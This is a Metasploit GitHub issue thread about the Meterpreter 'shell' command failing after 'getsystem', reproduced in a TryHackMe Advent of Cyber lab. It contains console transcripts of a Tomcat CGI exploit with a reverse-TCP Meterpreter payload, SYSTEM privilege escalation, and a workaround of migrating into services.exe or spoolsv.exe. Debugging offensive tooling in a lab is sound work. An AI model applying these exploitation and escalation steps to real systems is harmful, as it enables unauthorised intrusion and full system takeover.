Open AlanFoster opened 3 years ago
Am having the same issue with the exact same context on tryhackme's AoC2
Hmm just retested this on a Windows Server 2016 x64 target and near as I can tell this doesn't seem to be occurring for me.
msf6 exploit(multi/handler) > run
[*] Started bind TCP handler against 172.26.192.240:4444
[*] Sending stage (200262 bytes) to 172.26.192.240
[*] Meterpreter session 2 opened (0.0.0.0:0 -> 172.26.192.240:4444) at 2021-02-22 16:10:10 -0600
meterpreter > shell
Process 1672 created.
Channel 1 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Users\Administrator\Desktop>whoami
whoami
win-qka9jks5mvu\administrator
C:\Users\Administrator\Desktop>exit
exit
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > shell
[-] Failed to spawn shell with thread impersonation. Retrying without it.
Process 7956 created.
Channel 3 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Users\Administrator\Desktop>whoami
whoami
win-qka9jks5mvu\administrator
C:\Users\Administrator\Desktop>exit
exit
gmeterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > background
[*] Backgrounding session 2...
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/x64/meterpreter/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LPORT 4444 yes The listen port
RHOST 172.26.192.240 no The target address
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf6 exploit(multi/handler) >
When I tried it on the target using a command stager exploit which I think is where the difference comes in I notice I don't get the same warning about trying to run shell
as the SYSTEM
user and the automatic downgrading taking place. Furthermore, when I try use rev2self
to drop back down to a normal user, I'm able to run the shell
command again, despite previously not being able to run it.
msf6 exploit(windows/http/tomcat_cgi_cmdlineargs) > sessions -i 3
[*] Starting interaction with 3...
meterpreter > getuid
Server username: TBFC-WEB-01\elfmcskidy
meterpreter > sysinfo
Computer : TBFC-WEB-01
OS : Windows 2016+ (10.0 Build 17763).
Architecture : x64
System Language : en_GB
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 2732 created.
Channel 1 created.
meterpreter > sysinfo
Computer : TBFC-WEB-01
OS : Windows 2016+ (10.0 Build 17763).
Architecture : x64
System Language : en_GB
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
meterpreter > rev2self
meterpreter > shell
Process 1096 created.
Channel 2 created.
Microsoft Windows [Version 10.0.17763.1637]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Program Files\Apache Software Foundation\Tomcat 9.0\webapps\ROOT\WEB-INF\cgi-bin>
I faced a similar issue: running seemingly successfully the getsystem
command, but not getting a shell after that. After a few tests it seems that the reason for this behavior is that Windows uses the Primary Token (and not the impersonated token obtained with the getsystem
command) of a process to determine the actions that the process can perform. Most likely our current process's Primary Token does not allow us to pop a shell as SYSTEM.
To get around this problem, we can migrate to a process with higher permissions (such as services.exe) after using getsystem
, but before requesting for a shell.
Finally, i feel like this migration part could probably be automated and added to the getsystem
command.
Let me know if that fixes your issue :)
@JackPepper Thanks for the workaround, that worked for me. After running getsystem
, and migrating to the spoolsv.exe, it's now possible to open a shell :+1:
Also confirmed that rev2self works, but since you're no longer system with that approach - it's not as practical
I faced a similar issue: running seemingly successfully the
getsystem
command, but not getting a shell after that. After a few tests it seems that the reason for this behavior is that Windows uses the Primary Token (and not the impersonated token obtained with thegetsystem
command) of a process to determine the actions that the process can perform. Most likely our current process's Primary Token does not allow us to pop a shell as SYSTEM.To get around this problem, we can migrate to a process with higher permissions (such as services.exe) after using
getsystem
, but before requesting for a shell.Finally, i feel like this migration part could probably be automated and added to the
getsystem
command.Let me know if that fixes your issue :)
Thanks @T0m-Ph , this really helped me while doing one of the CTF. It's a great tip and glad to see someone who has been in the same situation solved this for the people who will be here in the future. :)
Steps to reproduce
Target: https://tryhackme.com/room/adventofcyber2 Day 12 Task 17 - Networking Ready, set, elf.
Getting meterpreter shell works fine; Running the
shell
command also works fine. However, after runninggetsystem
the shell command no longer works as expected:Expected behavior
shell
works after runninggetsystem
Current behavior
shell
no longer works:Logs show:
Metasploit version
Additional Information
Module/Datastore
The following global/module datastore, and database setup was configured before the issue occurred:
Collapse
``` [framework/core] loglevel=3 sessionlogging=true [framework/features] wrapped_tables=true RHOST_HTTP_URL=false [framework/ui/console] ActiveModule=exploit/windows/http/tomcat_cgi_cmdlineargs [windows/http/tomcat_cgi_cmdlineargs] RPORT=8080 WORKSPACE= VERBOSE=false WfsDelay=0 EnableContextEncoding=false ContextInformationFile= DisablePayloadHandler=false EXE::EICAR=false EXE::Custom= EXE::Path= EXE::Template= EXE::Inject=false EXE::OldMethod=false EXE::FallBack=false MSI::EICAR=false MSI::Custom= MSI::Path= MSI::Template= MSI::UAC=false ListenerComm= SSL=false SSLCert= SSLCompression=false SSLCipher= TCP::max_send_size=0 TCP::send_delay=0 RHOSTS=10.10.227.63 VHOST= Proxies= UserAgent=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) HttpUsername= HttpPassword= HttpRawHeaders= DigestAuthIIS=true SSLVersion=Auto FingerprintCheck=true DOMAIN=WORKSTATION HttpClientTimeout= HttpTrace=false HttpTraceHeadersOnly=false HttpTraceColors=red/blu HTTP::uri_encode_mode=hex-normal HTTP::uri_full_url=false HTTP::pad_method_uri_count=1 HTTP::pad_uri_version_count=1 HTTP::pad_method_uri_type=space HTTP::pad_uri_version_type=space HTTP::method_random_valid=false HTTP::method_random_invalid=false HTTP::method_random_case=false HTTP::version_random_valid=false HTTP::version_random_invalid=false HTTP::uri_dir_self_reference=false HTTP::uri_dir_fake_relative=false HTTP::uri_use_backslashes=false HTTP::pad_fake_headers=false HTTP::pad_fake_headers_count=0 HTTP::pad_get_params=false HTTP::pad_get_params_count=16 HTTP::pad_post_params=false HTTP::pad_post_params_count=16 HTTP::uri_fake_end=false HTTP::uri_fake_params_start=false HTTP::header_folding=false HTTP::no_cache=false HTTP::chunked=false HTTP::junk_headers=false HTTP::compression=none HTTP::server_name=Apache URIHOST= URIPORT= SendRobots=false CMDSTAGER::FLAVOR=auto CMDSTAGER::DECODER= CMDSTAGER::TEMP= CMDSTAGER::SSL=false TARGETURI=/cgi-bin/elfwhacker.bat AutoCheck=true ForceExploit=false PAYLOAD=windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=4444 ReverseListenerBindPort= ReverseAllowProxy=false ReverseListenerComm= ReverseListenerBindAddress= ReverseListenerThreaded=false StagerRetryCount=10 StagerRetryWait=5 PingbackRetries=0 PingbackSleep=30 PayloadUUIDSeed= PayloadUUIDRaw= PayloadUUIDName= PayloadUUIDTracking=false EnableStageEncoding=false StageEncoder= StageEncoderSaveRegisters= StageEncodingFallback=true PrependMigrate=false PrependMigrateProc= EXITFUNC=process PayloadBindPort= AutoLoadStdapi=true AutoVerifySession=true AutoVerifySessionTimeout=30 InitialAutoRunScript= AutoRunScript= AutoSystemInfo=true EnableUnicodeEncoding=false HandlerSSLCert= SessionRetryTotal=3600 SessionRetryWait=10 SessionExpirationTimeout=604800 SessionCommunicationTimeout=300 PayloadProcessCommandLine= AutoUnhookProcess=false TARETURI=/cgi-bin/elfwhacker.bat ```History
The following commands were ran during the session and before this issue occurred:
Collapse
``` 2885 use windows/http/tomcat_cgi_cmdlineargs 2886 options 2887 set LHOST tun0 2888 set TARETURI /cgi-bin/elfwhacker.bat 2889 set RHOSTS 10.10.227.63 2890 options 2891 run 2892 set TARGETURI /cgi-bin/elfwhacker.bat 2893 check 2894 run 2895 dir 2896 shell 2897 getsystem 2898 shell 2899 setg loglevel 3 2900 sessions -i -1 2901 shell 2902 debug ```Framework Errors
The following framework errors occurred before the issue occurred:
Collapse
``` [12/13/2020 19:41:32] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported [12/13/2020 19:41:32] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported [12/13/2020 19:41:32] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported [12/13/2020 19:41:32] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported [12/13/2020 19:41:36] [e(0)] core: Unexpected output running /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py: Traceback (most recent call last): File "/usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py", line 178, inWeb Service Errors
The following web service errors occurred before the issue occurred:
Collapse
``` msf-ws.log does not exist. ```Framework Logs
The following framework logs were recorded before the issue occurred:
Collapse
``` [12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/bind_tcp_uuid with windows/http/tomcat_cgi_cmdlineargs]: none to bind [12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/bind_tcp_uuid with windows/http/tomcat_cgi_cmdlineargs]: tunnel to bind [12/13/2020 19:41:37] [d(1)] core: Module windows/x64/vncinject/bind_tcp_uuid is compatible with windows/http/tomcat_cgi_cmdlineargs [12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_http with windows/http/tomcat_cgi_cmdlineargs]: reverse to tunnel [12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_http with windows/http/tomcat_cgi_cmdlineargs]: bind to tunnel [12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_http with windows/http/tomcat_cgi_cmdlineargs]: noconn to tunnel [12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_http with windows/http/tomcat_cgi_cmdlineargs]: none to tunnel [12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_http with windows/http/tomcat_cgi_cmdlineargs]: tunnel to tunnel [12/13/2020 19:41:37] [d(1)] core: Module windows/x64/vncinject/reverse_http is compatible with windows/http/tomcat_cgi_cmdlineargs [12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_https with windows/http/tomcat_cgi_cmdlineargs]: reverse to tunnel [12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_https with windows/http/tomcat_cgi_cmdlineargs]: bind to tunnel [12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_https with windows/http/tomcat_cgi_cmdlineargs]: noconn to tunnel [12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_https with windows/http/tomcat_cgi_cmdlineargs]: none to tunnel [12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_https with windows/http/tomcat_cgi_cmdlineargs]: tunnel to tunnel [12/13/2020 19:41:37] [d(1)] core: Module windows/x64/vncinject/reverse_https is compatible with windows/http/tomcat_cgi_cmdlineargs [12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp with windows/http/tomcat_cgi_cmdlineargs]: reverse to reverse [12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp with windows/http/tomcat_cgi_cmdlineargs]: bind to reverse [12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp with windows/http/tomcat_cgi_cmdlineargs]: noconn to reverse [12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp with windows/http/tomcat_cgi_cmdlineargs]: none to reverse [12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp with windows/http/tomcat_cgi_cmdlineargs]: tunnel to reverse [12/13/2020 19:41:37] [d(1)] core: Module windows/x64/vncinject/reverse_tcp is compatible with windows/http/tomcat_cgi_cmdlineargs [12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_rc4 with windows/http/tomcat_cgi_cmdlineargs]: reverse to reverse [12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_rc4 with windows/http/tomcat_cgi_cmdlineargs]: bind to reverse [12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_rc4 with windows/http/tomcat_cgi_cmdlineargs]: noconn to reverse [12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_rc4 with windows/http/tomcat_cgi_cmdlineargs]: none to reverse [12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_rc4 with windows/http/tomcat_cgi_cmdlineargs]: tunnel to reverse [12/13/2020 19:41:37] [d(1)] core: Module windows/x64/vncinject/reverse_tcp_rc4 is compatible with windows/http/tomcat_cgi_cmdlineargs [12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_uuid with windows/http/tomcat_cgi_cmdlineargs]: reverse to reverse [12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_uuid with windows/http/tomcat_cgi_cmdlineargs]: bind to reverse [12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_uuid with windows/http/tomcat_cgi_cmdlineargs]: noconn to reverse [12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_uuid with windows/http/tomcat_cgi_cmdlineargs]: none to reverse [12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_uuid with windows/http/tomcat_cgi_cmdlineargs]: tunnel to reverse [12/13/2020 19:41:37] [d(1)] core: Module windows/x64/vncinject/reverse_tcp_uuid is compatible with windows/http/tomcat_cgi_cmdlineargs [12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttp with windows/http/tomcat_cgi_cmdlineargs]: reverse to tunnel [12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttp with windows/http/tomcat_cgi_cmdlineargs]: bind to tunnel [12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttp with windows/http/tomcat_cgi_cmdlineargs]: noconn to tunnel [12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttp with windows/http/tomcat_cgi_cmdlineargs]: none to tunnel [12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttp with windows/http/tomcat_cgi_cmdlineargs]: tunnel to tunnel [12/13/2020 19:41:37] [d(1)] core: Module windows/x64/vncinject/reverse_winhttp is compatible with windows/http/tomcat_cgi_cmdlineargs [12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttps with windows/http/tomcat_cgi_cmdlineargs]: reverse to tunnel [12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttps with windows/http/tomcat_cgi_cmdlineargs]: bind to tunnel [12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttps with windows/http/tomcat_cgi_cmdlineargs]: noconn to tunnel [12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttps with windows/http/tomcat_cgi_cmdlineargs]: none to tunnel [12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttps with windows/http/tomcat_cgi_cmdlineargs]: tunnel to tunnel [12/13/2020 19:41:37] [d(1)] core: Module windows/x64/vncinject/reverse_winhttps is compatible with windows/http/tomcat_cgi_cmdlineargs [12/13/2020 19:46:32] [w(0)] core: monitor_rsock: the remote socket is nil, exiting loop [12/13/2020 19:46:38] [w(0)] core: monitor_rsock: the remote socket is nil, exiting loop [12/13/2020 19:46:41] [w(0)] core: monitor_rsock: the remote socket is nil, exiting loop [12/13/2020 19:47:13] [w(0)] core: monitor_rsock: the remote socket is nil, exiting loop [12/13/2020 19:47:55] [w(0)] core: monitor_rsock: the remote socket is nil, exiting loop ```Web Service Logs
The following web service logs were recorded before the issue occurred:
Collapse
``` msf-ws.log does not exist. ```Version/Install
The versions and install method of your Metasploit setup:
Collapse
``` Framework: 6.0.18-dev Ruby: ruby 2.7.1p83 (2020-03-31 revision a0c7c23c9c) [x86_64-linux-gnu] Install Root: /usr/share/metasploit-framework Session Type: postgresql selected, no connection Install Method: Other - Please specify ```